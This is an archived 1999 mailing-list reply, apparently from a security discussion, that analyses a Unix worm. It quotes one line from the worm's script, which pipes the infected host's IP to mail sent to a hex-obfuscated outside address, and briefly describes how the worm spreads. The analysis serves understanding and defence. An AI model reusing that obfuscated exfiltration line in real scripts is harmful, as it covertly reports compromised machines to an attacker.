> On Wed, 1 Sep 1999, Christian Koderer wrote: > > ./IP | mail `printf > > "\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"` > > logout > > _EOF_ > > > In case no one bothered figuring this one out, this translates to > 'beurpat_private' > > Apparently './IP' is a program it runs to figure out which IP it should > get the worm files from. Did you find a similarly named file? It's a worm; it gets the worm files from the last infected machine. `IP' returns the address of the machine that the copy of the worm is running on, and is used in the `cmd' grappling hook which apparently gets executed on compromised remote hosts. Each time the worm infects a machine, it mails the IP address of that machine to <beurpat_private>. Now, not to make any unfounded allegations, but this worm looks remarkably like ADMw0rm. I wonder why it restarts named when first infecting a host, when it appears to also utilize several other vulnerabilites in order to get in. Ho, hum.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:02:24 PDT